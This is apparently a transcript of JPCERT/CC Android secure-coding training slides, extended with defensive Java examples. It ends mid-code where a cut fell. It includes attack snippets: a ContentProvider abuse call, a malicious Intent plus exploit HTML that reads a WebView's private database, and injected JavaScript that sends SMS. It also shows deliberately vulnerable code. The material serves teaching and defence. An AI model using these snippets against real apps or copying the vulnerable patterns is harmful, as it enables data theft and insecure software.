Android Secure Coding (slide transcript)
Posted on 11-Nov-2014
Android Secure Coding
Sept 10th: Delhi / Sept 12th: Bangalore
Hiroshi Kumagai & Masaki Kubo Vulnerability Analysis Team JPCERT Coordination Center
Copyright©2014 JPCERT/CC All rights reserved.
Instructors
Hiroshi Kumagai, Lead Analyst (hiroshi.kumagai@jpcert.or.jp). After years of experience developing web applications/systems and Android apps and designing websites, Hiroshi joined JPCERT in 2011. Since then he has been analyzing vulnerabilities, developing analysis tools, and writing articles about secure coding for webzines.
Masaki Kubo, Vulnerability Analysis Team Lead (masaki.kubo@jpcert.or.jp). Masaki leads the vulnerability analysis team at JPCERT. Prior to joining JPCERT he developed software at SONY. Since 2006 he has led the secure coding initiative and has taught over 4000 programmers in Japan and the Asia-Pacific region. He is an expert of ISO/IEC SC27 WG4 and a visiting lecturer at the National Institute of Informatics.
Timetable
09:30 – 10:00 Part 1. Introduction
10:00 – 11:30 Part 2. Android Secure Coding Techniques
11:30 – 11:45 Tea Break
11:45 – 12:45 Part 3. Exercise: Vulnerability
12:45 – 13:30 Lunch Break
13:30 – 14:30 Part 3 (cont.)
14:30 – 15:30 Part 4. Security Code Review
15:30 – 15:45 Tea Break
15:45 – 17:00 Part 4 (cont.)
17:00 – 17:15 Feedback, Closing Remarks and FIN.
Goals of the Training
Understand the real-world threats to Android applications and the secure coding techniques that mitigate them.
Be able to apply that working knowledge to the security assessment and secure development of Android applications.
What We Do at JPCERT/CC
Conduct root cause analysis on privately reported vulnerabilities: reproduction, reverse engineering, source code analysis, design review, etc.
Talk to vendors to ask for a fix.
Train developers in C/C++/Java/Android secure coding.
Root Cause Analysis
• Defining the problem: what is the vulnerability?
• Data/evidence collection and verification: reproducing the vulnerability
• Pinpointing the root cause
• Countermeasures
Part 1. Introduction
Android User Base Grows in 2014
[Source] The Guardian (January 13, 2014), "Smartphone explosion in 2014 will see ownership in India pass US"
Android Security on News Headlines
http://www.pcmag.com/article2/0,2817,2464103,00.asp
http://www.zdnet.com/68-percent-of-top-free-android-apps-vulnerable-to-cyberattack-researchers-claim-7000032875/
http://www.pcworld.com/article/2099421/report-malwareinfected-android-apps-spike-in-the-google-play-store.html
http://www.cnet.com/how-to/malware-authors-target-android-phones/
Categories of Android App Security Issues
• Viruses (malicious apps) and potentially unwanted apps: not so much to do with app developers
• Vulnerable apps: yes, this is our concern; the responsibility is on app developers
[Source] Android App Vulnerability Survey Report, October 2013 edition (Androidアプリ脆弱性調査レポート 2013年10月版), http://www.sonydna.com/sdna/solution/android_vulnerability_report_201310.pdf
Impact and Countermeasures
Category | Potential Impact | Countermeasures
Virus (Malicious Apps) | Distribute virus-infected apps to end users | Scan apps with anti-virus before releasing them (easily mitigated)
Potentially Unwanted Apps | Distribute annoying apps to end users, bringing bad corporate reputation | Change the design so that it does not collect users' sensitive info unnecessarily; prepare and publish a privacy policy for the app (easily mitigated)
Vulnerable Apps | End users' privacy gets compromised; damages corporate reputation as well | App developers need to design apps securely and code securely (challenging, not easily accomplished)
Secure Android App Development
• Virus (malicious apps): scan with anti-virus before releasing apps
• Potentially unwanted apps: design so as not to annoy end users
• Vulnerable apps: we'll look at it in detail later
# of Android App Vulnerabilities Reported in Japan
[Chart] The number of Android app vulnerabilities reported, by year. 2012 was the year of the vulnerable-app explosion in private reports.
http://www.ipa.go.jp/security/vuln/report/JVNiPedia2012q3.html
Survey of Android Application Vulnerability
Survey of Vulnerabilities in Android Apps 2013, http://www.sonydna.com/sdna/solution/android_vulnerability_report_201310.pdf
96% of the apps in the market are vulnerable: almost all Android apps contain some vulnerability, and vulnerability is not properly controlled in Android apps.
Developers Make the Same Easy Mistakes
The same easy mistakes are repeated: file permissions, logging, exported settings.
All app developers should have: knowledge of the Android-specific security model, and secure coding best practice.
[Chart] Breakdown of reported issues: improper access control (component, file), others.
http://www.ipa.go.jp/about/technicalwatch/pdf/120613report.pdf
# of Android App Vulnerabilities JPCERT Coordinated
Advisories published: 50 apps
Under coordination: 200 apps
For most of the cases, developers have been cooperative and responsive.
Categories of Android App Vulnerability
App Component Exposure
1. Unintended Activity Exposure
2. Local Server Accessible from Other Apps
3. Unintended Content Provider Exposure
WebView
4. File Scheme
5. addJavascriptInterface
6. Address Bar Spoofing
7. JavaScript Execution Context
Casual Info Disclosure
8. Broadcasting Sensitive Information
9. Logging Sensitive Information
10. Storing Sensitive Data on the SD Card
11. Improper File Permissions
HTML5
12. Geolocation API and Privacy Concerns
'Classic' Vulnerability
13. Cryptographic Issues
14. Path Traversal
15. Unsafe Decompression of Zip Files
16. Improper Certificate Verification
'Bugs' and 'Vulnerabilities'
[Figure: Whittaker and Thompson, 2003] Specification: how we want the software to behave (programmer's intent). Implementation: how the software actually behaves. Where the two diverge, a bug is specified behavior missing from the implementation, and a vulnerability is implemented behavior that was never specified.
Secure software does what it is supposed to do and doesn't do what it is not expected to do.
What is Secure Coding? (Wikipedia)
“Secure coding is the practice of developing computer software in a way that guards against the accidental introduction of security vulnerabilities. Defects, bugs and logic flaws are consistently the primary cause of commonly exploited software vulnerabilities. Through the analysis of thousands of reported vulnerabilities, security professionals have discovered that most vulnerabilities stem from a relatively small number of common software programming errors. By identifying the insecure coding practices that lead to these errors and educating developers on secure alternatives, organizations can take proactive steps to help significantly reduce or eliminate vulnerabilities in software before deployment.”
Android App Vulnerabilities
In Part 2, we will look at each real-world vulnerability to discuss: the nature of the vulnerability, the root cause, how to address the vulnerability, and references.
Android Security Discussions G+ Community
A great place to catch up with the latest discussion about any security issue on Android.
https://plus.google.com/communities/118124907618051049043
Reference for a Developer
Android Application Secure Design / Secure Coding Guidebook by JSSEC: http://www.jssec.org/dl/android_securecoding_en_20140701.pdf
The reference secure implementations in the guidebook can be copied and pasted for commercial use under the Apache License version 2.0.
Other Resources
Understanding Android's Security Framework: not a recent resource, but still a good introduction to the Android-specific security model. http://siis.cse.psu.edu/slides/android-sec-tutorial.pdf
Secure Mobile Development Best Practices: https://viaforensics.com/resources/reports/best-practices-ios-android-secure-mobile-development/
Reverse Engineering, Pentesting and Hardening of Android Apps: https://speakerdeck.com/viaforensics/droidcon2014
CASE #1: Unintended Activity Exposure
Third-Party Twitter Client with Improper Access Control to Its Components
A third-party Twitter client for Android with picture-uploading capability (package jp.r246.twicca). It allowed other applications with no network access permission to upload pictures, so a malicious app could impersonate the user to tweet.
https://play.google.com/store/apps/details?id=jp.r246.twicca
http://jvn.jp/en/jp/JVN31860555/
Attack Scenario: Information Disclosure
1. Malware generates a URL for a picture in local storage (file://..., e.g. file://sdcard/…/PrivatePhoto.jpg).
2. Malware passes the URL to the picture-uploading activity.
3. The activity tweets with the picture.
Result: personal information is tweeted to the public.
Attack Scenario: Impersonation
1. Malware generates a URL for a malicious picture (file://..., e.g. file://mal/malpic.jpg).
2. Malware passes the URL to the picture-uploading activity.
3. The activity tweets with the picture.
Result: a malicious picture is tweeted from the user's Twitter account.
The Cause of the Vulnerability
• The picture-uploading activity was intended to be used internally.
• But the activity was exported (accessible from other apps)!
• Other apps could therefore send Intents (request actions) to this activity.
Solution
Explicitly declare the activity as private with android:exported="false" in AndroidManifest.xml:
...
<activity
    android:name=".PicUploadActivity"
    ...
    android:exported="false" />
...
Refer to the JSSEC Secure Coding Guidebook
4.1.1.1. Creating/Using Private Activities. Private: designed to be used inside the app only (android:exported="false").
[Figure: sample manifest file and sample secure Java code from the guidebook]
How the App Was Fixed
…
public void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    ...
    // this check was added
    ComponentName caller = this.getCallingActivity();
    if (caller == null) {
        // null unless the caller used startActivityForResult()
        this.finish();
    } else if (!"jp.r246.twicca".equals(caller.getPackageName())) {
        this.finish();
    } else {
        // code for uploading pictures
        …
    }
}
The added code checks whether the package name of the calling activity is the same as its own package name. getCallingActivity() is filled in by the system, so a caller cannot spoof it, but it is only available when the activity was started with startActivityForResult(); a caller using plain startActivity() is rejected as well. The more appropriate fix is android:exported="false".
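As an added example (not from the JPCERT slides or from the twicca app), the following audit routine asks the PackageManager for the effective export status of every component in the running app and lists those that any other app can reach without holding a permission. The class name is mine; the PackageManager fields it reads are the standard ones.

```java
import android.content.Context;
import android.content.pm.ActivityInfo;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.content.pm.ProviderInfo;
import android.content.pm.ServiceInfo;
import java.util.ArrayList;
import java.util.List;

/**
 * Added example: enumerate this app's own components as the system sees them
 * and report every one that other apps can reach without any permission.
 * Call it from a debug build or an instrumented test.
 */
public final class ExportAudit {

    private ExportAudit() {}

    public static List<String> findUnprotectedExports(Context ctx)
            throws PackageManager.NameNotFoundException {
        List<String> findings = new ArrayList<>();
        PackageInfo pi = ctx.getPackageManager().getPackageInfo(
                ctx.getPackageName(),
                PackageManager.GET_ACTIVITIES | PackageManager.GET_SERVICES
                        | PackageManager.GET_RECEIVERS | PackageManager.GET_PROVIDERS);

        // 'exported' is the effective value: an explicit android:exported, or, for a
        // component that declares an <intent-filter> without setting it, the implicit
        // default of true. That implicit default is exactly what bit the Twitter client.
        if (pi.activities != null) {
            for (ActivityInfo a : pi.activities) {
                if (a.exported && a.permission == null) {
                    findings.add("activity " + a.name);
                }
            }
        }
        if (pi.services != null) {
            for (ServiceInfo s : pi.services) {
                if (s.exported && s.permission == null) {
                    findings.add("service " + s.name);
                }
            }
        }
        if (pi.receivers != null) {
            // Broadcast receivers are reported through ActivityInfo objects.
            for (ActivityInfo r : pi.receivers) {
                if (r.exported && r.permission == null) {
                    findings.add("receiver " + r.name);
                }
            }
        }
        if (pi.providers != null) {
            for (ProviderInfo p : pi.providers) {
                boolean unguarded = p.readPermission == null && p.writePermission == null;
                if (p.exported && unguarded) {
                    findings.add("provider " + p.name + " (authority " + p.authority + ")");
                }
            }
        }
        return findings;
    }
}
```

The launcher activity will legitimately appear in the list; every other entry needs a justification or an android:exported="false". Note that from Android 12 (API 31) the platform refuses to install an app that leaves android:exported unset on a component with an intent filter, so being explicit, as the slide recommends, is now mandatory rather than merely good practice.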
CASE #2: Local Server Accessible from Other Apps
Case
ES File Explorer File Manager
Feature: file and application manager
Problem: files on the external media could be obtained by others
https://play.google.com/store/apps/details?id=com.estrongs.android.pop
HTTP Server Is Started
When you play music files or videos in this app, its own HTTP server is launched on the device.
Unrestricted Access
The HTTP server allowed unrestricted access. By accessing the HTTP server from the WAN, a list of files on the external media could be seen, and those files could be downloaded.
Attack Scenarios
Conditions: the server could be attacked only while media files were being played.
Scenario: induce the user to play media files; the attacker obtains the IP address of the device in some way; the attacker accesses that IP address.
This can be difficult to attack.
Solution
Limit the accessibility of the local server:
• User authentication: use an ID and password
• IP address restrictions: make it inaccessible from the WAN
Consider: other apps on the device may also be able to reach the local server. Is there a need to launch a local server at all?
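An added example, written for this page and not taken from ES File Explorer, of how a media-streaming server inside an app can be limited as the slide suggests: bind to the loopback interface so nothing off the device can connect, require a per-launch random token that only this process knows (in place of an ID and password, which make little sense for an internal player), and confine file access to the media root. Class and method names are mine.

```java
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.net.Socket;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;

/**
 * Added example: a local media server that (1) listens on 127.0.0.1 only,
 * (2) requires a random per-launch token in the URL, and (3) refuses paths
 * that escape the media root.
 */
public final class LocalMediaServer implements Runnable {
    private final ServerSocket listener;
    private final File root;
    private final byte[] token;

    public LocalMediaServer(File mediaRoot) throws IOException {
        root = mediaRoot.getCanonicalFile();
        // Port 0 = any free port; 127.0.0.1 = loopback only, unreachable from Wi-Fi or the WAN.
        listener = new ServerSocket(0, 8, InetAddress.getByName("127.0.0.1"));
        byte[] raw = new byte[16];
        new SecureRandom().nextBytes(raw);
        token = hex(raw).getBytes(StandardCharsets.US_ASCII);
    }

    /** URL handed to the in-app MediaPlayer; it carries the secret token. */
    public String urlFor(String relativePath) {
        return "http://127.0.0.1:" + listener.getLocalPort() + "/"
                + new String(token, StandardCharsets.US_ASCII) + "/" + relativePath;
    }

    @Override
    public void run() {
        while (!listener.isClosed()) {
            try (Socket client = listener.accept()) {
                handle(client);
            } catch (IOException ignored) {
                // a failing connection must not take the listener down
            }
        }
    }

    /** Resolves "/<token>/<path>" to a file under root, or null if the request must be refused. */
    File resolve(String requestTarget) throws IOException {
        if (requestTarget == null || !requestTarget.startsWith("/")) return null;
        int slash = requestTarget.indexOf('/', 1);
        if (slash < 0) return null;
        byte[] presented = requestTarget.substring(1, slash).getBytes(StandardCharsets.US_ASCII);
        // Constant-time comparison so response timing does not leak the token.
        if (!MessageDigest.isEqual(presented, token)) return null;
        File f = new File(root, requestTarget.substring(slash + 1)).getCanonicalFile();
        // The canonical path must stay under root: blocks ../ traversal.
        if (!f.getPath().startsWith(root.getPath() + File.separator)) return null;
        return f.isFile() ? f : null;
    }

    private void handle(Socket client) throws IOException {
        client.setSoTimeout(5000);
        String requestLine = readLine(client.getInputStream());
        String[] parts = requestLine == null ? new String[0] : requestLine.split(" ");
        File f = parts.length == 3 && "GET".equals(parts[0]) ? resolve(parts[1]) : null;
        OutputStream out = client.getOutputStream();
        if (f == null) {
            // One generic refusal: a probing client learns neither whether the token
            // nor whether the path was wrong.
            out.write("HTTP/1.0 404 Not Found\r\nContent-Length: 0\r\n\r\n".getBytes(StandardCharsets.US_ASCII));
            return;
        }
        out.write(("HTTP/1.0 200 OK\r\nContent-Length: " + f.length() + "\r\n\r\n").getBytes(StandardCharsets.US_ASCII));
        try (InputStream in = new FileInputStream(f)) {
            byte[] buf = new byte[8192];
            int n;
            while ((n = in.read(buf)) > 0) out.write(buf, 0, n);
        }
        out.flush();
    }

    private static String readLine(InputStream in) throws IOException {
        StringBuilder sb = new StringBuilder();
        int c;
        while ((c = in.read()) >= 0 && c != '\n' && sb.length() < 4096) {
            if (c != '\r') sb.append((char) c);
        }
        return sb.length() == 0 ? null : sb.toString();
    }

    private static String hex(byte[] b) {
        StringBuilder sb = new StringBuilder();
        for (byte x : b) sb.append(String.format("%02x", x));
        return sb.toString();
    }
}
```

Start it with new Thread(server).start() and feed urlFor(...) to the MediaPlayer. Other apps on the same device can still open a socket to 127.0.0.1, which is why the token exists: as long as the URL is only handed to the player inside this process, no other app learns it. The question on the slide still stands first, though: if the player can read the file directly, the server is not needed at all.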
CASE #3: Unintended Content Provider Exposure
Content Provider
A mechanism to share data between applications. It makes reading/writing data easy to implement: the app does not need to worry about locking or exclusive access control.
Case
Vulnerable app (has not been fixed yet)
Feature: a day planner app for Android. The integration of TODO and Note memos links the scheduled plan with its corresponding information.
Problem: the Content Provider was made public. Other apps could access the application data via this app's Content Provider.
https://play.google.com/store/apps/details?id=jp.co.xxxxxx.android.xxxxxxx
Assumption of the Developer
[Diagram] The developer intended the Content Provider to share data (READ/WRITE) between this app and known apps A and B.
In Fact
[Diagram] Any other app, including malicious apps, can retrieve/manipulate data through the Content Provider, not just App A and App B.
Data Access/Manipulation
What can an attacker do? Retrieve/manipulate note memos, photos, TODO items, voice memos. For example:
final String CONTENT_URI = "content://jp.co.XXXX.XXXXXX.XXXXXXX.XXXXXX";
ContentValues values = new ContentValues();
// attacker-chosen "filename" pointing into the victim app's private database
values.put("filename", "/data/data/jp.co.XXXX.XXXXXX.XXXXXXX.XXXXXX/databases/xxx");
values.put("titlename", "hogehoge");
getContentResolver().insert(Uri.parse(CONTENT_URI + "/textmemo"), values);
To Share Data: Points to Consider in the Implementation
Range of other apps that you want to share data with:
• an unspecified large number of apps
• limit access to apps that have the same signature
• limit access to apps that hold a specific permission
Contents of the data: any concerns about sharing them with other apps?
What do you want to achieve through sharing: only allow retrieving the shared data, or allow adding, editing and deleting as well?
To Share Data #1: Unspecified Large Number of Apps
The Content Provider is made public to other apps. From Android 4.2 (API 17) or later, a Content Provider is private if you do not specify the attribute explicitly (both android:minSdkVersion and android:targetSdkVersion need to be 17 or later for this default), so declare it explicitly in AndroidManifest.xml:
<provider
    android:name="SampleContentProvider"
    android:authorities="com.example.app.Provider"
    android:exported="true" />
To Share Data #2: Limit Access to Apps with the Same Signature
AndroidManifest.xml:
<permission
    android:protectionLevel="signature"
    android:name="com.example.app.permission.Provider" />
<provider
    android:name="SampleContentProvider"
    android:authorities="com.example.app.Provider"
    android:permission="com.example.app.permission.Provider" />
With protectionLevel="signature" the permission is granted only to apps signed with the same certificate as the app that declares it; no user prompt is involved. When android:targetSdkVersion is 17 or later the provider also needs android:exported="true", otherwise the default of false makes it unreachable even for apps that hold the permission.
To Share Data #3: Limit Access to Apps with a Specific Permission
AndroidManifest.xml:
<permission android:name="com.example.app.permission.Provider" />
<provider
    android:name="RssContentProvider"
    android:authorities="com.example.app.Provider"
    android:permission="com.example.app.permission.Provider" />
A permission declared without android:protectionLevel defaults to "normal", which is granted automatically to any app that requests it in its manifest. This only forces an accessing app to declare the permission; it does not keep a malicious app out. Use "signature" (as in #2) or "dangerous" when the data is sensitive. As with #2, targetSdkVersion 17 or later also needs android:exported="true".
Do Not Want to Share Data: Points to Consider in the Implementation
Is it really necessary to use a Content Provider? If not, do not use one.
Otherwise make the Content Provider private by specifying android:exported="false" in AndroidManifest.xml.
Do Not Want to Share Data #1: Do Not Use a Content Provider
Connect directly to the database using the SQLiteDatabase or SQLiteOpenHelper class. Other apps can NOT connect to the database.
// Opened through the Context with MODE_PRIVATE: the file lives in this app's
// private data directory and is readable only by this app
SQLiteDatabase db = getContext().openOrCreateDatabase(DATABASE, Context.MODE_PRIVATE, null);
long id = db.insert("items", null, values);
db.close();
Do Not Want to Share Data #2: Make the Content Provider Private
Specify the "android:exported" attribute in AndroidManifest.xml. However, in Android 2.2 (API 8) or before, even if you explicitly declare android:exported="false", your Content Provider is accessible from other apps.
<provider
    android:name="SampleContentProvider"
    android:authorities="com.example.app.Provider"
    android:exported="false" />
Refer to the JSSEC Secure Coding Guidebook
The risks and countermeasures of using a Content Provider are described there.
Summary
Is there a need to use a Content Provider? A Content Provider is basically an API for sharing data.
• If you don't need to share data between apps: DO NOT USE a Content Provider; connect directly to the database.
• If you need to share data between apps: do not include sensitive information, and limit the apps that can connect to the Content Provider.
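An added example (not the day planner's code) that combines the manifest-level signature permission from "To share data #2" with checks in code, so that even a misconfigured manifest does not turn the provider into the write-anything endpoint the earlier insert() snippet abused. The authority, permission name and column names are assumptions.

```java
import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.UriMatcher;
import android.content.pm.PackageManager;
import android.database.Cursor;
import android.database.MatrixCursor;
import android.net.Uri;
import android.os.Binder;
import android.os.Process;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.List;
import java.util.Set;

/**
 * Added example. Manifest it assumes (names are made up for the example):
 *   <permission android:name="com.example.planner.permission.MEMO"
 *               android:protectionLevel="signature" />
 *   <provider android:name=".MemoProvider"
 *             android:authorities="com.example.planner.memo"
 *             android:exported="true"
 *             android:permission="com.example.planner.permission.MEMO" />
 */
public class MemoProvider extends ContentProvider {
    static final String AUTHORITY = "com.example.planner.memo";
    static final String[] COLUMNS = {"_id", "titlename", "body"};
    private static final Set<String> WRITABLE = new HashSet<>(Arrays.asList("titlename", "body"));
    private static final int MEMOS = 1;
    private static final UriMatcher MATCHER = new UriMatcher(UriMatcher.NO_MATCH);
    static { MATCHER.addURI(AUTHORITY, "textmemo", MEMOS); }

    // In-memory store to keep the example self-contained; a real app uses SQLiteOpenHelper.
    private final List<ContentValues> rows = new ArrayList<>();

    @Override public boolean onCreate() { return true; }

    /** Defence in depth: true only if the calling uid is signed with the same certificate as we are. */
    boolean callerSignedLikeUs() {
        PackageManager pm = getContext().getPackageManager();
        return pm.checkSignatures(Binder.getCallingUid(), Process.myUid()) == PackageManager.SIGNATURE_MATCH;
    }

    /** Keeps only columns we own, so an attacker-chosen key such as "filename" never reaches storage. */
    static ContentValues filterColumns(ContentValues in) {
        ContentValues out = new ContentValues();
        for (String key : in.keySet()) {
            if (WRITABLE.contains(key)) out.put(key, in.getAsString(key));
        }
        return out;
    }

    @Override public Uri insert(Uri uri, ContentValues values) {
        if (MATCHER.match(uri) != MEMOS) throw new IllegalArgumentException("Unknown URI " + uri);
        if (!callerSignedLikeUs()) throw new SecurityException("caller is not signed with our certificate");
        ContentValues clean = filterColumns(values);
        if (!clean.containsKey("titlename")) throw new IllegalArgumentException("titlename required");
        synchronized (rows) {
            long id = rows.size() + 1;
            clean.put("_id", id);
            rows.add(clean);
            return Uri.withAppendedPath(uri, Long.toString(id));
        }
    }

    @Override public Cursor query(Uri uri, String[] projection, String sel, String[] selArgs, String order) {
        if (MATCHER.match(uri) != MEMOS) throw new IllegalArgumentException("Unknown URI " + uri);
        // Reads are gated by the manifest permission; we expose only our own columns whatever the projection.
        MatrixCursor c = new MatrixCursor(COLUMNS);
        synchronized (rows) {
            for (ContentValues r : rows) {
                c.addRow(new Object[]{r.getAsLong("_id"), r.getAsString("titlename"), r.getAsString("body")});
            }
        }
        return c;
    }

    @Override public int update(Uri uri, ContentValues v, String sel, String[] args) { throw new UnsupportedOperationException(); }
    @Override public int delete(Uri uri, String sel, String[] args) { throw new UnsupportedOperationException(); }
    @Override public String getType(Uri uri) { return "vnd.android.cursor.dir/vnd.com.example.planner.memo"; }
}
```

The manifest permission is the primary gate and the in-code signature check catches the case where someone later relaxes it; the column allowlist removes the attacker's ability to choose which file the provider touches. Binder.getCallingUid() is reliable here because provider methods run on the binder thread of the incoming call.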
WebView (Cases 4 to 7)
4. File Scheme
5. addJavascriptInterface
6. Address Bar Spoofing
7. JavaScript Execution Context
CASE #4: File Scheme
Case
Yahoo! Japan Browser / Sleipnir Mobile
Feature: web browser apps
Problem: a WebView with JavaScript enabled that loads any URI passed through an Intent without any validation.
Vulnerable code
public class MyBrowser extends Activity {
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        WebView webView = (WebView) findViewById(R.id.webview);
        // turn on javascript
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);
        // the Activity received an Intent that may contain malicious data:
        // it loads any URI it is given
        String turl = getIntent().getStringExtra("URL");
        webView.loadUrl(turl);
    }
}
Activity That Implements the WebView
This vulnerability is often seen in apps that implement a WebView. [Diagram] App A's WebView activity is public, has JavaScript enabled, and loads any URI that App B passes in an Intent; the app's private data (DB, cookies, cache) lives in the same sandbox.
Attack Scenario
[Diagram] The attacker prepares a crafted HTML file. The malicious app sends an Intent to the vulnerable app's public WebView activity (JavaScript enabled, any URI accepted); the data the page reads (cookies, cache) flows to the attacker's server.
Malicious App Sends an Intent
String pkg = "jp.vulnerable.android.app";
String cls = pkg + ".DummyLauncherActivity";
String uri = "file:///[Exploit html file]";
Intent intent = new Intent();
intent.setClassName(pkg, cls);
intent.putExtra("url", uri);
this.startActivity(intent);
The vulnerable activity loads whatever it was given:
…
String turl = getIntent().getStringExtra("url");
webView.loadUrl(turl);
Open an Exploit HTML File
The crafted HTML file the attacker prepared is loaded from the file: URI with JavaScript enabled:
<script>
  var target = "file:///data/data/jp.vulnerable.android.app/databases/webview.db";
  var xhr = new XMLHttpRequest();
  xhr.overrideMimeType("text/plain; charset=iso-8859-1");
  xhr.open("GET", target, true);
  xhr.onreadystatechange = function() {
    if (xhr.readyState != 4) return;
    var data = xhr.responseText;
    ... // the slide elides the rest; the diagram shows the data going to the attacker's server
  };
  xhr.send();
</script>
It can be abused to access the vulnerable app's resources, here webview.db in the app's private data directory.
Conditions of the Vulnerable App
• A WebView is implemented and JavaScript is enabled
• The Activity is public and accepts any URI from an Intent
• The file scheme is enabled
Information managed by the vulnerable app may be disclosed.
Solution
Validate the URI received in the Intent: do not accept a URI with the file scheme; either do not display the page, or disable JavaScript. (Both variants below also handle a missing extra, which the original one-liners would dereference, and compare case-insensitively after trimming, since "FILE:" or " file:" would slip past a plain startsWith.)
Do not display the page:
String intentUrl = getIntent().getStringExtra("url");
String loadUrl = "about:blank";
if (intentUrl != null && !intentUrl.trim().toLowerCase(Locale.ROOT).startsWith("file:")) {
    loadUrl = intentUrl;
}
webView.loadUrl(loadUrl);
Disable JavaScript:
String intentUrl = getIntent().getStringExtra("url");
wSettings.setJavaScriptEnabled(false);
if (intentUrl != null && !intentUrl.trim().toLowerCase(Locale.ROOT).startsWith("file:")) {
    wSettings.setJavaScriptEnabled(true);
}
Android 4.1 or Later
Several new methods have been added:
• WebSettings#setAllowFileAccessFromFileURLs: whether JavaScript running in a file: page may read other file: URLs
• WebSettings#setAllowUniversalAccessFromFileURLs: whether JavaScript running in a file: page may read content from any origin
Their default depends on the app's targetSdkVersion: true when targeting API 15 or below, false when targeting API 16 or later. Set both to false explicitly; they close the cross-file read used in the exploit above, but only on devices that have them, so the URI validation remains necessary.
http://developer.android.com/reference/android/webkit/WebSettings.html#setAllowFileAccessFromFileURLs(boolean)
Refer to the JSSEC Secure Coding Guidebook
Be careful when receiving URIs.
CASE #5: addJavascriptInterface
Case
Cybozu KUNAI, http://products.cybozu.co.jp/kunai/
Feature: app for accessing groupware
Problem: contained a vulnerability that allows addJavascriptInterface to be exploited. When opening a specially crafted website, an attacker could execute an arbitrary Java method.
addJavascriptInterface
WebView#addJavascriptInterface binds the supplied Java object into the WebView and allows the Java object's methods to be accessed from JavaScript.
http://developer.android.com/reference/android/webkit/WebView.html
webView.addJavascriptInterface(new Object(), "injectedObject");
webView.loadData("", "text/html", null);
webView.loadUrl("javascript:alert(injectedObject.toString())");
The object can be called from JavaScript by the name "injectedObject".
Notes on addJavascriptInterface
It allows an app to be manipulated through JavaScript. It should not process untrusted content; it should only process trusted content!
http://developer.android.com/guide/webapps/webview.html
Example: Access to a Java Method from JavaScript
@Override
public void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.demo);
    context = this.getApplicationContext();
    webView = (WebView) findViewById(R.id.demoWebView);
    webView.getSettings().setJavaScriptEnabled(true);
    // bind the SmsJSInterface object to the WebView under the name "smsJSInterface"
    webView.addJavascriptInterface(new SmsJSInterface(this), "smsJSInterface");
    GetSomeInfo getInfo = new GetSomeInfo(); // AsyncTask that loads the page (not shown on the slide)
    getInfo.execute(null, null);
}

public class SmsJSInterface implements Cloneable {
    Context mContext;
    public SmsJSInterface(Context context) {
        mContext = context;
    }
    // sends an SMS (the app must hold android.permission.SEND_SMS)
    public void sendSMS(String phoneNumber, String message) {
        SmsManager sms = SmsManager.getDefault();
        sms.sendTextMessage(phoneNumber, null, message, null, null);
    }
}
Accessed from JavaScript in the loaded page, which sends the SMS:
<script>
  smsJSInterface.sendSMS('0123456789', 'hogehoge');
</script>
Conditions of Vulnerable Apps
• A WebView is implemented and JavaScript is enabled
• Java objects are registered with addJavascriptInterface
• JavaScript can be passed in from other apps
Dangerous because it allows unexpected control by an attacker.
Reference: Risk of addJavascriptInterface
Through reflection, a bound object can be used to reach Runtime.exec(): remote code execution.
MWR InfoSecurity, "WebView addJavascriptInterface Remote Code Execution", https://labs.mwrinfosecurity.com/blog/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
Summary
Prefer a design that does not use addJavascriptInterface. If you need to use it, use only trusted content.
DO NOT USE WebView#addJavascriptInterface.
Android 4.2 (API 17) or Later
class JsObject {
    @JavascriptInterface
    public String toString() { return "injectedObject"; }
}
webView.addJavascriptInterface(new JsObject(), "injectedObject");
webView.loadData("", "text/html", null);
webView.loadUrl("javascript:alert(injectedObject.toString())");
Only public methods annotated with @JavascriptInterface can be accessed from JavaScript. This restriction applies only when the app's android:targetSdkVersion is 17 or later; an app targeting an older API level keeps the old behavior (every public method reachable, including via reflection) even on a 4.2 device.
http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
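If addJavascriptInterface cannot be avoided, the following added example (written for this page, not Cybozu KUNAI's code) shows the shape the slides argue for: a bridge that exposes only @JavascriptInterface-annotated methods taking allowlisted arguments, and a WebViewClient that refuses to navigate anywhere but one https origin, so untrusted content never runs with the bridge present. Host name, bridge name and action names are assumptions.

```java
import android.net.Uri;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

/** Added example: a minimal, origin-pinned JavaScript bridge (requires targetSdkVersion >= 17). */
public final class TrustedBridge {
    static final String TRUSTED_HOST = "groupware.example.com"; // assumed
    static final String BRIDGE_NAME = "appBridge";               // assumed

    /** Only methods carrying @JavascriptInterface are callable from JS on API 17+. */
    public static final class Bridge {
        private static final Set<String> ACTIONS = new HashSet<>(Arrays.asList("refresh", "logout"));

        @JavascriptInterface
        public String apiVersion() { return "1"; }

        /** Dispatches a named action from a fixed allowlist; anything else is refused, never reflected. */
        @JavascriptInterface
        public boolean perform(String action) {
            if (action == null || !ACTIONS.contains(action)) return false;
            // ... hand off to the app's own code here
            return true;
        }

        // Public but NOT annotated: invisible to JavaScript on API 17+.
        public void internalOnly() { }
    }

    /** Only https pages on the trusted host may be loaded into the bridged WebView. */
    static boolean isTrusted(String url) {
        if (url == null) return false;
        Uri u = Uri.parse(url.trim());
        String scheme = u.getScheme();
        String host = u.getHost();
        return scheme != null && "https".equals(scheme.toLowerCase(Locale.ROOT))
                && host != null && TRUSTED_HOST.equals(host.toLowerCase(Locale.ROOT));
    }

    public static void attach(WebView wv, String startUrl) {
        WebSettings s = wv.getSettings();
        s.setJavaScriptEnabled(true);
        s.setAllowFileAccess(false); // a file:// page must never see the bridge
        wv.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                // true cancels the navigation: links and script-driven moves to any other
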